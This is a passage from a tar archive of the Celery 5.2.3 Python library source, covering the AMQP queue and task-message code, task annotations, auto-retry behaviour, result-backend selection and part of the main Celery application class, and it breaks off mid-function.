exchange (kombu.Exchange, str): if queue is str, specifies exchange name. routing_key (str): if queue is str, specifies binding key. exchange_type (str): if queue is str, specifies type of exchange. **options (Any): Additional declaration options used when queue is a str. """ if not isinstance(queue, Queue): return self.add_compat(queue, **kwargs) return self._add(queue) def add_compat(self, name, **options): # docs used to use binding_key as routing key options.setdefault('routing_key', options.get('binding_key')) if options['routing_key'] is None: options['routing_key'] = name return self._add(Queue.from_dict(name, **options)) def _add(self, queue): if queue.exchange is None or queue.exchange.name == '': queue.exchange = self.default_exchange if not queue.routing_key: queue.routing_key = self.default_routing_key if self.max_priority is not None: if queue.queue_arguments is None: queue.queue_arguments = {} self._set_max_priority(queue.queue_arguments) self[queue.name] = queue return queue def _set_max_priority(self, args): if 'x-max-priority' not in args and self.max_priority is not None: return args.update({'x-max-priority': self.max_priority}) def format(self, indent=0, indent_first=True): """Format routing table into string for log dumps.""" active = self.consume_from if not active: return '' info = [QUEUE_FORMAT.strip().format(q) for _, q in sorted(active.items())] if indent_first: return textindent('\n'.join(info), indent) return info[0] + '\n' + textindent('\n'.join(info[1:]), indent) def select_add(self, queue, **kwargs): """Add new task queue that'll be consumed from. The queue will be active even when a subset has been selected using the :option:`celery worker -Q` option. """ q = self.add(queue, **kwargs) if self._consume_from is not None: self._consume_from[q.name] = q return q def select(self, include): """Select a subset of currently defined queues to consume from. Arguments: include (Sequence[str], str): Names of queues to consume from. """ if include: self._consume_from = { name: self[name] for name in maybe_list(include) } def deselect(self, exclude): """Deselect queues so that they won't be consumed from. Arguments: exclude (Sequence[str], str): Names of queues to avoid consuming from. """ if exclude: exclude = maybe_list(exclude) if self._consume_from is None: # using all queues return self.select(k for k in self if k not in exclude) # using selection for queue in exclude: self._consume_from.pop(queue, None) def new_missing(self, name): return Queue(name, self.autoexchange(name), name) @property def consume_from(self): if self._consume_from is not None: return self._consume_from return self class AMQP: """App AMQP API: app.amqp.""" Connection = Connection Consumer = Consumer Producer = Producer #: compat alias to Connection BrokerConnection = Connection queues_cls = Queues #: Cached and prepared routing table. _rtable = None #: Underlying producer pool instance automatically #: set by the :attr:`producer_pool`. _producer_pool = None # Exchange class/function used when defining automatic queues. # For example, you can use ``autoexchange = lambda n: None`` to use the # AMQP default exchange: a shortcut to bypass routing # and instead send directly to the queue named in the routing key. autoexchange = None #: Max size of positional argument representation used for #: logging purposes. argsrepr_maxsize = 1024 #: Max size of keyword argument representation used for logging purposes. 
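    # Sketch (assumption: illustrative only) of how these limits are applied
    # when protocol-2 messages are built, via
    # :func:`celery.utils.saferepr.saferepr`::
    #
    #     argsrepr = saferepr(args, self.argsrepr_maxsize)
    #     kwargsrepr = saferepr(kwargs, self.kwargsrepr_maxsize)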
kwargsrepr_maxsize = 1024 def __init__(self, app): self.app = app self.task_protocols = { 1: self.as_task_v1, 2: self.as_task_v2, } self.app._conf.bind_to(self._handle_conf_update) @cached_property def create_task_message(self): return self.task_protocols[self.app.conf.task_protocol] @cached_property def send_task_message(self): return self._create_task_sender() def Queues(self, queues, create_missing=None, autoexchange=None, max_priority=None): # Create new :class:`Queues` instance, using queue defaults # from the current configuration. conf = self.app.conf default_routing_key = conf.task_default_routing_key if create_missing is None: create_missing = conf.task_create_missing_queues if max_priority is None: max_priority = conf.task_queue_max_priority if not queues and conf.task_default_queue: queues = (Queue(conf.task_default_queue, exchange=self.default_exchange, routing_key=default_routing_key),) autoexchange = (self.autoexchange if autoexchange is None else autoexchange) return self.queues_cls( queues, self.default_exchange, create_missing, autoexchange, max_priority, default_routing_key, ) def Router(self, queues=None, create_missing=None): """Return the current task router.""" return _routes.Router(self.routes, queues or self.queues, self.app.either('task_create_missing_queues', create_missing), app=self.app) def flush_routes(self): self._rtable = _routes.prepare(self.app.conf.task_routes) def TaskConsumer(self, channel, queues=None, accept=None, **kw): if accept is None: accept = self.app.conf.accept_content return self.Consumer( channel, accept=accept, queues=queues or list(self.queues.consume_from.values()), **kw ) def as_task_v2(self, task_id, name, args=None, kwargs=None, countdown=None, eta=None, group_id=None, group_index=None, expires=None, retries=0, chord=None, callbacks=None, errbacks=None, reply_to=None, time_limit=None, soft_time_limit=None, create_sent_event=False, root_id=None, parent_id=None, shadow=None, chain=None, now=None, timezone=None, origin=None, ignore_result=False, argsrepr=None, kwargsrepr=None): args = args or () kwargs = kwargs or {} if not isinstance(args, (list, tuple)): raise TypeError('task args must be a list or tuple') if not isinstance(kwargs, Mapping): raise TypeError('task keyword arguments must be a mapping') if countdown: # convert countdown to ETA self._verify_seconds(countdown, 'countdown') now = now or self.app.now() timezone = timezone or self.app.timezone eta = maybe_make_aware( now + timedelta(seconds=countdown), tz=timezone, ) if isinstance(expires, numbers.Real): self._verify_seconds(expires, 'expires') now = now or self.app.now() timezone = timezone or self.app.timezone expires = maybe_make_aware( now + timedelta(seconds=expires), tz=timezone, ) if not isinstance(eta, str): eta = eta and eta.isoformat() # If we retry a task `expires` will already be ISO8601-formatted. 
if not isinstance(expires, str): expires = expires and expires.isoformat() if argsrepr is None: argsrepr = saferepr(args, self.argsrepr_maxsize) if kwargsrepr is None: kwargsrepr = saferepr(kwargs, self.kwargsrepr_maxsize) if not root_id: # empty root_id defaults to task_id root_id = task_id return task_message( headers={ 'lang': 'py', 'task': name, 'id': task_id, 'shadow': shadow, 'eta': eta, 'expires': expires, 'group': group_id, 'group_index': group_index, 'retries': retries, 'timelimit': [time_limit, soft_time_limit], 'root_id': root_id, 'parent_id': parent_id, 'argsrepr': argsrepr, 'kwargsrepr': kwargsrepr, 'origin': origin or anon_nodename(), 'ignore_result': ignore_result, }, properties={ 'correlation_id': task_id, 'reply_to': reply_to or '', }, body=( args, kwargs, { 'callbacks': callbacks, 'errbacks': errbacks, 'chain': chain, 'chord': chord, }, ), sent_event={ 'uuid': task_id, 'root_id': root_id, 'parent_id': parent_id, 'name': name, 'args': argsrepr, 'kwargs': kwargsrepr, 'retries': retries, 'eta': eta, 'expires': expires, } if create_sent_event else None, ) def as_task_v1(self, task_id, name, args=None, kwargs=None, countdown=None, eta=None, group_id=None, group_index=None, expires=None, retries=0, chord=None, callbacks=None, errbacks=None, reply_to=None, time_limit=None, soft_time_limit=None, create_sent_event=False, root_id=None, parent_id=None, shadow=None, now=None, timezone=None, **compat_kwargs): args = args or () kwargs = kwargs or {} utc = self.utc if not isinstance(args, (list, tuple)): raise TypeError('task args must be a list or tuple') if not isinstance(kwargs, Mapping): raise TypeError('task keyword arguments must be a mapping') if countdown: # convert countdown to ETA self._verify_seconds(countdown, 'countdown') now = now or self.app.now() eta = now + timedelta(seconds=countdown) if isinstance(expires, numbers.Real): self._verify_seconds(expires, 'expires') now = now or self.app.now() expires = now + timedelta(seconds=expires) eta = eta and eta.isoformat() expires = expires and expires.isoformat() return task_message( headers={}, properties={ 'correlation_id': task_id, 'reply_to': reply_to or '', }, body={ 'task': name, 'id': task_id, 'args': args, 'kwargs': kwargs, 'group': group_id, 'group_index': group_index, 'retries': retries, 'eta': eta, 'expires': expires, 'utc': utc, 'callbacks': callbacks, 'errbacks': errbacks, 'timelimit': (time_limit, soft_time_limit), 'taskset': group_id, 'chord': chord, }, sent_event={ 'uuid': task_id, 'name': name, 'args': saferepr(args), 'kwargs': saferepr(kwargs), 'retries': retries, 'eta': eta, 'expires': expires, } if create_sent_event else None, ) def _verify_seconds(self, s, what): if s < INT_MIN: raise ValueError(f'{what} is out of range: {s!r}') return s def _create_task_sender(self): default_retry = self.app.conf.task_publish_retry default_policy = self.app.conf.task_publish_retry_policy default_delivery_mode = self.app.conf.task_default_delivery_mode default_queue = self.default_queue queues = self.queues send_before_publish = signals.before_task_publish.send before_receivers = signals.before_task_publish.receivers send_after_publish = signals.after_task_publish.send after_receivers = signals.after_task_publish.receivers send_task_sent = signals.task_sent.send # XXX compat sent_receivers = signals.task_sent.receivers default_evd = self._event_dispatcher default_exchange = self.default_exchange default_rkey = self.app.conf.task_default_routing_key default_serializer = self.app.conf.task_serializer default_compressor = 
self.app.conf.result_compression def send_task_message(producer, name, message, exchange=None, routing_key=None, queue=None, event_dispatcher=None, retry=None, retry_policy=None, serializer=None, delivery_mode=None, compression=None, declare=None, headers=None, exchange_type=None, **kwargs): retry = default_retry if retry is None else retry headers2, properties, body, sent_event = message if headers: headers2.update(headers) if kwargs: properties.update(kwargs) qname = queue if queue is None and exchange is None: queue = default_queue if queue is not None: if isinstance(queue, str): qname, queue = queue, queues[queue] else: qname = queue.name if delivery_mode is None: try: delivery_mode = queue.exchange.delivery_mode except AttributeError: pass delivery_mode = delivery_mode or default_delivery_mode if exchange_type is None: try: exchange_type = queue.exchange.type except AttributeError: exchange_type = 'direct' # convert to anon-exchange, when exchange not set and direct ex. if (not exchange or not routing_key) and exchange_type == 'direct': exchange, routing_key = '', qname elif exchange is None: # not topic exchange, and exchange not undefined exchange = queue.exchange.name or default_exchange routing_key = routing_key or queue.routing_key or default_rkey if declare is None and queue and not isinstance(queue, Broadcast): declare = [queue] # merge default and custom policy retry = default_retry if retry is None else retry _rp = (dict(default_policy, **retry_policy) if retry_policy else default_policy) if before_receivers: send_before_publish( sender=name, body=body, exchange=exchange, routing_key=routing_key, declare=declare, headers=headers2, properties=properties, retry_policy=retry_policy, ) ret = producer.publish( body, exchange=exchange, routing_key=routing_key, serializer=serializer or default_serializer, compression=compression or default_compressor, retry=retry, retry_policy=_rp, delivery_mode=delivery_mode, declare=declare, headers=headers2, **properties ) if after_receivers: send_after_publish(sender=name, body=body, headers=headers2, exchange=exchange, routing_key=routing_key) if sent_receivers: # XXX deprecated if isinstance(body, tuple): # protocol version 2 send_task_sent( sender=name, task_id=headers2['id'], task=name, args=body[0], kwargs=body[1], eta=headers2['eta'], taskset=headers2['group'], ) else: # protocol version 1 send_task_sent( sender=name, task_id=body['id'], task=name, args=body['args'], kwargs=body['kwargs'], eta=body['eta'], taskset=body['taskset'], ) if sent_event: evd = event_dispatcher or default_evd exname = exchange if isinstance(exname, Exchange): exname = exname.name sent_event.update({ 'queue': qname, 'exchange': exname, 'routing_key': routing_key, }) evd.publish('task-sent', sent_event, producer, retry=retry, retry_policy=retry_policy) return ret return send_task_message @cached_property def default_queue(self): return self.queues[self.app.conf.task_default_queue] @cached_property def queues(self): """Queue name⇒ declaration mapping.""" return self.Queues(self.app.conf.task_queues) @queues.setter def queues(self, queues): return self.Queues(queues) @property def routes(self): if self._rtable is None: self.flush_routes() return self._rtable @cached_property def router(self): return self.Router() @router.setter def router(self, value): return value @property def producer_pool(self): if self._producer_pool is None: self._producer_pool = pools.producers[ self.app.connection_for_write()] self._producer_pool.limit = self.app.pool.limit return 
self._producer_pool publisher_pool = producer_pool # compat alias @cached_property def default_exchange(self): return Exchange(self.app.conf.task_default_exchange, self.app.conf.task_default_exchange_type) @cached_property def utc(self): return self.app.conf.enable_utc @cached_property def _event_dispatcher(self): # We call Dispatcher.publish with a custom producer # so don't need the diuspatcher to be enabled. return self.app.events.Dispatcher(enabled=False) def _handle_conf_update(self, *args, **kwargs): if ('task_routes' in kwargs or 'task_routes' in args): self.flush_routes() self.router = self.Router() return ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/app/annotations.py0000664000175000017500000000264500000000000017656 0ustar00asifasif00000000000000"""Task Annotations. Annotations is a nice term for monkey-patching task classes in the configuration. This prepares and performs the annotations in the :setting:`task_annotations` setting. """ from celery.utils.functional import firstmethod, mlazy from celery.utils.imports import instantiate _first_match = firstmethod('annotate') _first_match_any = firstmethod('annotate_any') __all__ = ('MapAnnotation', 'prepare', 'resolve_all') class MapAnnotation(dict): """Annotation map: task_name => attributes.""" def annotate_any(self): try: return dict(self['*']) except KeyError: pass def annotate(self, task): try: return dict(self[task.name]) except KeyError: pass def prepare(annotations): """Expand the :setting:`task_annotations` setting.""" def expand_annotation(annotation): if isinstance(annotation, dict): return MapAnnotation(annotation) elif isinstance(annotation, str): return mlazy(instantiate, annotation) return annotation if annotations is None: return () elif not isinstance(annotations, (list, tuple)): annotations = (annotations,) return [expand_annotation(anno) for anno in annotations] def resolve_all(anno, task): """Resolve all pending annotations.""" return (x for x in (_first_match(anno, task), _first_match_any(anno)) if x) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1637501858.0 celery-5.2.3/celery/app/autoretry.py0000664000175000017500000000435700000000000017361 0ustar00asifasif00000000000000"""Tasks auto-retry functionality.""" from vine.utils import wraps from celery.exceptions import Ignore, Retry from celery.utils.time import get_exponential_backoff_interval def add_autoretry_behaviour(task, **options): """Wrap task's `run` method with auto-retry functionality.""" autoretry_for = tuple( options.get('autoretry_for', getattr(task, 'autoretry_for', ())) ) retry_kwargs = options.get( 'retry_kwargs', getattr(task, 'retry_kwargs', {}) ) retry_backoff = int( options.get('retry_backoff', getattr(task, 'retry_backoff', False)) ) retry_backoff_max = int( options.get('retry_backoff_max', getattr(task, 'retry_backoff_max', 600)) ) retry_jitter = options.get( 'retry_jitter', getattr(task, 'retry_jitter', True) ) if autoretry_for and not hasattr(task, '_orig_run'): @wraps(task.run) def run(*args, **kwargs): try: return task._orig_run(*args, **kwargs) except Ignore: # If Ignore signal occurs task shouldn't be retried, # even if it suits autoretry_for list raise except Retry: raise except autoretry_for as exc: if retry_backoff: retry_kwargs['countdown'] = \ get_exponential_backoff_interval( factor=retry_backoff, retries=task.request.retries, maximum=retry_backoff_max, full_jitter=retry_jitter) # Override 
max_retries if hasattr(task, 'override_max_retries'): retry_kwargs['max_retries'] = getattr(task, 'override_max_retries', task.max_retries) ret = task.retry(exc=exc, **retry_kwargs) # Stop propagation if hasattr(task, 'override_max_retries'): delattr(task, 'override_max_retries') raise ret task._orig_run, task.run = task.run, run ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/app/backends.py0000664000175000017500000000531500000000000017070 0ustar00asifasif00000000000000"""Backend selection.""" import sys import types from celery._state import current_app from celery.exceptions import ImproperlyConfigured, reraise from celery.utils.imports import load_extension_class_names, symbol_by_name __all__ = ('by_name', 'by_url') UNKNOWN_BACKEND = """ Unknown result backend: {0!r}. Did you spell that correctly? ({1!r}) """ BACKEND_ALIASES = { 'amqp': 'celery.backends.amqp:AMQPBackend', 'rpc': 'celery.backends.rpc.RPCBackend', 'cache': 'celery.backends.cache:CacheBackend', 'redis': 'celery.backends.redis:RedisBackend', 'rediss': 'celery.backends.redis:RedisBackend', 'sentinel': 'celery.backends.redis:SentinelBackend', 'mongodb': 'celery.backends.mongodb:MongoBackend', 'db': 'celery.backends.database:DatabaseBackend', 'database': 'celery.backends.database:DatabaseBackend', 'elasticsearch': 'celery.backends.elasticsearch:ElasticsearchBackend', 'cassandra': 'celery.backends.cassandra:CassandraBackend', 'couchbase': 'celery.backends.couchbase:CouchbaseBackend', 'couchdb': 'celery.backends.couchdb:CouchBackend', 'cosmosdbsql': 'celery.backends.cosmosdbsql:CosmosDBSQLBackend', 'riak': 'celery.backends.riak:RiakBackend', 'file': 'celery.backends.filesystem:FilesystemBackend', 'disabled': 'celery.backends.base:DisabledBackend', 'consul': 'celery.backends.consul:ConsulBackend', 'dynamodb': 'celery.backends.dynamodb:DynamoDBBackend', 'azureblockblob': 'celery.backends.azureblockblob:AzureBlockBlobBackend', 'arangodb': 'celery.backends.arangodb:ArangoDbBackend', 's3': 'celery.backends.s3:S3Backend', } def by_name(backend=None, loader=None, extension_namespace='celery.result_backends'): """Get backend class by name/alias.""" backend = backend or 'disabled' loader = loader or current_app.loader aliases = dict(BACKEND_ALIASES, **loader.override_backends) aliases.update( load_extension_class_names(extension_namespace) or {}) try: cls = symbol_by_name(backend, aliases) except ValueError as exc: reraise(ImproperlyConfigured, ImproperlyConfigured( UNKNOWN_BACKEND.strip().format(backend, exc)), sys.exc_info()[2]) if isinstance(cls, types.ModuleType): raise ImproperlyConfigured(UNKNOWN_BACKEND.strip().format( backend, 'is a Python module, not a backend class.')) return cls def by_url(backend=None, loader=None): """Get backend class by URL.""" url = None if backend and '://' in backend: url = backend scheme, _, _ = url.partition('://') if '+' in scheme: backend, url = url.split('+', 1) else: backend = scheme return by_name(backend, loader), url ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1637501858.0 celery-5.2.3/celery/app/base.py0000664000175000017500000013641200000000000016233 0ustar00asifasif00000000000000"""Actual App instance implementation.""" import inspect import os import sys import threading import warnings from collections import UserDict, defaultdict, deque from datetime import datetime from operator import attrgetter from click.exceptions import Exit from kombu import pools from 
kombu.clocks import LamportClock from kombu.common import oid_from from kombu.utils.compat import register_after_fork from kombu.utils.objects import cached_property from kombu.utils.uuid import uuid from vine import starpromise from celery import platforms, signals from celery._state import (_announce_app_finalized, _deregister_app, _register_app, _set_current_app, _task_stack, connect_on_app_finalize, get_current_app, get_current_worker_task, set_default_app) from celery.exceptions import AlwaysEagerIgnored, ImproperlyConfigured from celery.loaders import get_loader_cls from celery.local import PromiseProxy, maybe_evaluate from celery.utils import abstract from celery.utils.collections import AttributeDictMixin from celery.utils.dispatch import Signal from celery.utils.functional import first, head_from_fun, maybe_list from celery.utils.imports import gen_task_name, instantiate, symbol_by_name from celery.utils.log import get_logger from celery.utils.objects import FallbackContext, mro_lookup from celery.utils.time import maybe_make_aware, timezone, to_utc # Load all builtin tasks from . import builtins # noqa from . import backends from .annotations import prepare as prepare_annotations from .autoretry import add_autoretry_behaviour from .defaults import DEFAULT_SECURITY_DIGEST, find_deprecated_settings from .registry import TaskRegistry from .utils import (AppPickler, Settings, _new_key_to_old, _old_key_to_new, _unpickle_app, _unpickle_app_v2, appstr, bugreport, detect_settings) __all__ = ('Celery',) logger = get_logger(__name__) BUILTIN_FIXUPS = { 'celery.fixups.django:fixup', } USING_EXECV = os.environ.get('FORKED_BY_MULTIPROCESSING') ERR_ENVVAR_NOT_SET = """ The environment variable {0!r} is not set, and as such the configuration could not be loaded. Please set this variable and make sure it points to a valid configuration module. Example: {0}="proj.celeryconfig" """ def app_has_custom(app, attr): """Return true if app has customized method `attr`. Note: This is used for optimizations in cases where we know how the default behavior works, but need to account for someone using inheritance to override a method/property. """ return mro_lookup(app.__class__, attr, stop={Celery, object}, monkey_patched=[__name__]) def _unpickle_appattr(reverse_name, args): """Unpickle app.""" # Given an attribute name and a list of args, gets # the attribute from the current app and calls it. return get_current_app()._rgetattr(reverse_name)(*args) def _after_fork_cleanup_app(app): # This is used with multiprocessing.register_after_fork, # so need to be at module level. try: app._after_fork() except Exception as exc: # pylint: disable=broad-except logger.info('after forker raised exception: %r', exc, exc_info=1) class PendingConfiguration(UserDict, AttributeDictMixin): # `app.conf` will be of this type before being explicitly configured, # meaning the app can keep any configuration set directly # on `app.conf` before the `app.config_from_object` call. # # accessing any key will finalize the configuration, # replacing `app.conf` with a concrete settings object. 
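    # Rough behavioural sketch (assumption: illustrative only)::
    #
    #     app = Celery('proj')
    #     app.conf.task_default_queue = 'proj'   # stored, nothing finalized yet
    #     app.config_from_object('proj.config')  # 'proj.config' is hypothetical
    #     app.conf.task_default_queue            # first read finalizes app.conf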
callback = None _data = None def __init__(self, conf, callback): object.__setattr__(self, '_data', conf) object.__setattr__(self, 'callback', callback) def __setitem__(self, key, value): self._data[key] = value def clear(self): self._data.clear() def update(self, *args, **kwargs): self._data.update(*args, **kwargs) def setdefault(self, *args, **kwargs): return self._data.setdefault(*args, **kwargs) def __contains__(self, key): # XXX will not show finalized configuration # setdefault will cause `key in d` to happen, # so for setdefault to be lazy, so does contains. return key in self._data def __len__(self): return len(self.data) def __repr__(self): return repr(self.data) @cached_property def data(self): return self.callback() class Celery: """Celery application. Arguments: main (str): Name of the main module if running as `__main__`. This is used as the prefix for auto-generated task names. Keyword Arguments: broker (str): URL of the default broker used. backend (Union[str, Type[celery.backends.base.Backend]]): The result store backend class, or the name of the backend class to use. Default is the value of the :setting:`result_backend` setting. autofinalize (bool): If set to False a :exc:`RuntimeError` will be raised if the task registry or tasks are used before the app is finalized. set_as_current (bool): Make this the global current app. include (List[str]): List of modules every worker should import. amqp (Union[str, Type[AMQP]]): AMQP object or class name. events (Union[str, Type[celery.app.events.Events]]): Events object or class name. log (Union[str, Type[Logging]]): Log object or class name. control (Union[str, Type[celery.app.control.Control]]): Control object or class name. tasks (Union[str, Type[TaskRegistry]]): A task registry, or the name of a registry class. fixups (List[str]): List of fix-up plug-ins (e.g., see :mod:`celery.fixups.django`). config_source (Union[str, class]): Take configuration from a class, or object. Attributes may include any settings described in the documentation. task_cls (Union[str, Type[celery.app.task.Task]]): base task class to use. See :ref:`this section ` for usage. """ #: This is deprecated, use :meth:`reduce_keys` instead Pickler = AppPickler SYSTEM = platforms.SYSTEM IS_macOS, IS_WINDOWS = platforms.IS_macOS, platforms.IS_WINDOWS #: Name of the `__main__` module. Required for standalone scripts. #: #: If set this will be used instead of `__main__` when automatically #: generating task names. main = None #: Custom options for command-line programs. #: See :ref:`extending-commandoptions` user_options = None #: Custom bootsteps to extend and modify the worker. #: See :ref:`extending-bootsteps`. steps = None builtin_fixups = BUILTIN_FIXUPS amqp_cls = 'celery.app.amqp:AMQP' backend_cls = None events_cls = 'celery.app.events:Events' loader_cls = None log_cls = 'celery.app.log:Logging' control_cls = 'celery.app.control:Control' task_cls = 'celery.app.task:Task' registry_cls = 'celery.app.registry:TaskRegistry' #: Thread local storage. _local = None _fixups = None _pool = None _conf = None _after_fork_registered = False #: Signal sent when app is loading configuration. on_configure = None #: Signal sent after app has prepared the configuration. on_after_configure = None #: Signal sent after app has been finalized. on_after_finalize = None #: Signal sent by every new process after fork. 
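    # Connection sketch (assumption: the handler and task below are
    # hypothetical)::
    #
    #     app = Celery('proj')
    #
    #     @app.on_after_configure.connect
    #     def setup_periodic_tasks(sender, **kwargs):
    #         sender.add_periodic_task(10.0, some_task.s())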
on_after_fork = None def __init__(self, main=None, loader=None, backend=None, amqp=None, events=None, log=None, control=None, set_as_current=True, tasks=None, broker=None, include=None, changes=None, config_source=None, fixups=None, task_cls=None, autofinalize=True, namespace=None, strict_typing=True, **kwargs): self._local = threading.local() self.clock = LamportClock() self.main = main self.amqp_cls = amqp or self.amqp_cls self.events_cls = events or self.events_cls self.loader_cls = loader or self._get_default_loader() self.log_cls = log or self.log_cls self.control_cls = control or self.control_cls self.task_cls = task_cls or self.task_cls self.set_as_current = set_as_current self.registry_cls = symbol_by_name(self.registry_cls) self.user_options = defaultdict(set) self.steps = defaultdict(set) self.autofinalize = autofinalize self.namespace = namespace self.strict_typing = strict_typing self.configured = False self._config_source = config_source self._pending_defaults = deque() self._pending_periodic_tasks = deque() self.finalized = False self._finalize_mutex = threading.Lock() self._pending = deque() self._tasks = tasks if not isinstance(self._tasks, TaskRegistry): self._tasks = self.registry_cls(self._tasks or {}) # If the class defines a custom __reduce_args__ we need to use # the old way of pickling apps: pickling a list of # args instead of the new way that pickles a dict of keywords. self._using_v1_reduce = app_has_custom(self, '__reduce_args__') # these options are moved to the config to # simplify pickling of the app object. self._preconf = changes or {} self._preconf_set_by_auto = set() self.__autoset('broker_url', broker) self.__autoset('result_backend', backend) self.__autoset('include', include) for key, value in kwargs.items(): self.__autoset(key, value) self._conf = Settings( PendingConfiguration( self._preconf, self._finalize_pending_conf), prefix=self.namespace, keys=(_old_key_to_new, _new_key_to_old), ) # - Apply fix-ups. self.fixups = set(self.builtin_fixups) if fixups is None else fixups # ...store fixup instances in _fixups to keep weakrefs alive. self._fixups = [symbol_by_name(fixup)(self) for fixup in self.fixups] if self.set_as_current: self.set_current() # Signals if self.on_configure is None: # used to be a method pre 4.0 self.on_configure = Signal(name='app.on_configure') self.on_after_configure = Signal( name='app.on_after_configure', providing_args={'source'}, ) self.on_after_finalize = Signal(name='app.on_after_finalize') self.on_after_fork = Signal(name='app.on_after_fork') # Boolean signalling, whether fast_trace_task are enabled. # this attribute is set in celery.worker.trace and checked by celery.worker.request self.use_fast_trace_task = False self.on_init() _register_app(self) def _get_default_loader(self): # the --loader command-line argument sets the environment variable. 
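        # Hedged sketch (the loader path below is hypothetical); setting the
        # environment variable before the app is created has the same effect::
        #
        #     os.environ['CELERY_LOADER'] = 'myproj.loaders:Loader'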
return ( os.environ.get('CELERY_LOADER') or self.loader_cls or 'celery.loaders.app:AppLoader' ) def on_init(self): """Optional callback called at init.""" def __autoset(self, key, value): if value is not None: self._preconf[key] = value self._preconf_set_by_auto.add(key) def set_current(self): """Make this the current app for this thread.""" _set_current_app(self) def set_default(self): """Make this the default app for all threads.""" set_default_app(self) def _ensure_after_fork(self): if not self._after_fork_registered: self._after_fork_registered = True if register_after_fork is not None: register_after_fork(self, _after_fork_cleanup_app) def close(self): """Clean up after the application. Only necessary for dynamically created apps, and you should probably use the :keyword:`with` statement instead. Example: >>> with Celery(set_as_current=False) as app: ... with app.connection_for_write() as conn: ... pass """ self._pool = None _deregister_app(self) def start(self, argv=None): """Run :program:`celery` using `argv`. Uses :data:`sys.argv` if `argv` is not specified. """ from celery.bin.celery import celery celery.params[0].default = self if argv is None: argv = sys.argv try: celery.main(args=argv, standalone_mode=False) except Exit as e: return e.exit_code finally: celery.params[0].default = None def worker_main(self, argv=None): """Run :program:`celery worker` using `argv`. Uses :data:`sys.argv` if `argv` is not specified. """ if argv is None: argv = sys.argv if 'worker' not in argv: raise ValueError( "The worker sub-command must be specified in argv.\n" "Use app.start() to programmatically start other commands." ) self.start(argv=argv) def task(self, *args, **opts): """Decorator to create a task class out of any callable. See :ref:`Task options` for a list of the arguments that can be passed to this decorator. Examples: .. code-block:: python @app.task def refresh_feed(url): store_feed(feedparser.parse(url)) with setting extra options: .. code-block:: python @app.task(exchange='feeds') def refresh_feed(url): return store_feed(feedparser.parse(url)) Note: App Binding: For custom apps the task decorator will return a proxy object, so that the act of creating the task is not performed until the task is used or the task registry is accessed. If you're depending on binding to be deferred, then you must not access any attributes on the returned object until the application is fully set up (finalized). """ if USING_EXECV and opts.get('lazy', True): # When using execv the task in the original module will point to a # different app, so doing things like 'add.request' will point to # a different task instance. This makes sure it will always use # the task instance from the current app. # Really need a better solution for this :( from . 
import shared_task return shared_task(*args, lazy=False, **opts) def inner_create_task_cls(shared=True, filter=None, lazy=True, **opts): _filt = filter def _create_task_cls(fun): if shared: def cons(app): return app._task_from_fun(fun, **opts) cons.__name__ = fun.__name__ connect_on_app_finalize(cons) if not lazy or self.finalized: ret = self._task_from_fun(fun, **opts) else: # return a proxy object that evaluates on first use ret = PromiseProxy(self._task_from_fun, (fun,), opts, __doc__=fun.__doc__) self._pending.append(ret) if _filt: return _filt(ret) return ret return _create_task_cls if len(args) == 1: if callable(args[0]): return inner_create_task_cls(**opts)(*args) raise TypeError('argument 1 to @task() must be a callable') if args: raise TypeError( '@task() takes exactly 1 argument ({} given)'.format( sum([len(args), len(opts)]))) return inner_create_task_cls(**opts) def _task_from_fun(self, fun, name=None, base=None, bind=False, **options): if not self.finalized and not self.autofinalize: raise RuntimeError('Contract breach: app not finalized') name = name or self.gen_task_name(fun.__name__, fun.__module__) base = base or self.Task if name not in self._tasks: run = fun if bind else staticmethod(fun) task = type(fun.__name__, (base,), dict({ 'app': self, 'name': name, 'run': run, '_decorated': True, '__doc__': fun.__doc__, '__module__': fun.__module__, '__annotations__': fun.__annotations__, '__header__': staticmethod(head_from_fun(fun, bound=bind)), '__wrapped__': run}, **options))() # for some reason __qualname__ cannot be set in type() # so we have to set it here. try: task.__qualname__ = fun.__qualname__ except AttributeError: pass self._tasks[task.name] = task task.bind(self) # connects task to this app add_autoretry_behaviour(task, **options) else: task = self._tasks[name] return task def register_task(self, task, **options): """Utility for registering a task-based class. Note: This is here for compatibility with old Celery 1.0 style task classes, you should not need to use this for new projects. """ task = inspect.isclass(task) and task() or task if not task.name: task_cls = type(task) task.name = self.gen_task_name( task_cls.__name__, task_cls.__module__) add_autoretry_behaviour(task, **options) self.tasks[task.name] = task task._app = self task.bind(self) return task def gen_task_name(self, name, module): return gen_task_name(self, name, module) def finalize(self, auto=False): """Finalize the app. This loads built-in tasks, evaluates pending task decorators, reads configuration, etc. """ with self._finalize_mutex: if not self.finalized: if auto and not self.autofinalize: raise RuntimeError('Contract breach: app not finalized') self.finalized = True _announce_app_finalized(self) pending = self._pending while pending: maybe_evaluate(pending.popleft()) for task in self._tasks.values(): task.bind(self) self.on_after_finalize.send(sender=self) def add_defaults(self, fun): """Add default configuration from dict ``d``. If the argument is a callable function then it will be regarded as a promise, and it won't be loaded until the configuration is actually needed. This method can be compared to: .. code-block:: pycon >>> celery.conf.update(d) with a difference that 1) no copy will be made and 2) the dict will not be transferred when the worker spawns child processes, so it's important that the same configuration happens at import time when pickle restores the object on the other side. 
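        Example:
            A hedged sketch, assuming ``app`` is an existing :class:`Celery`
            instance; the setting values are illustrative only:

            >>> app.add_defaults({'task_default_queue': 'default'})
            >>> app.add_defaults(lambda: {'result_expires': 3600})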
""" if not callable(fun): d, fun = fun, lambda: d if self.configured: return self._conf.add_defaults(fun()) self._pending_defaults.append(fun) def config_from_object(self, obj, silent=False, force=False, namespace=None): """Read configuration from object. Object is either an actual object or the name of a module to import. Example: >>> celery.config_from_object('myapp.celeryconfig') >>> from myapp import celeryconfig >>> celery.config_from_object(celeryconfig) Arguments: silent (bool): If true then import errors will be ignored. force (bool): Force reading configuration immediately. By default the configuration will be read only when required. """ self._config_source = obj self.namespace = namespace or self.namespace if force or self.configured: self._conf = None if self.loader.config_from_object(obj, silent=silent): return self.conf def config_from_envvar(self, variable_name, silent=False, force=False): """Read configuration from environment variable. The value of the environment variable must be the name of a module to import. Example: >>> os.environ['CELERY_CONFIG_MODULE'] = 'myapp.celeryconfig' >>> celery.config_from_envvar('CELERY_CONFIG_MODULE') """ module_name = os.environ.get(variable_name) if not module_name: 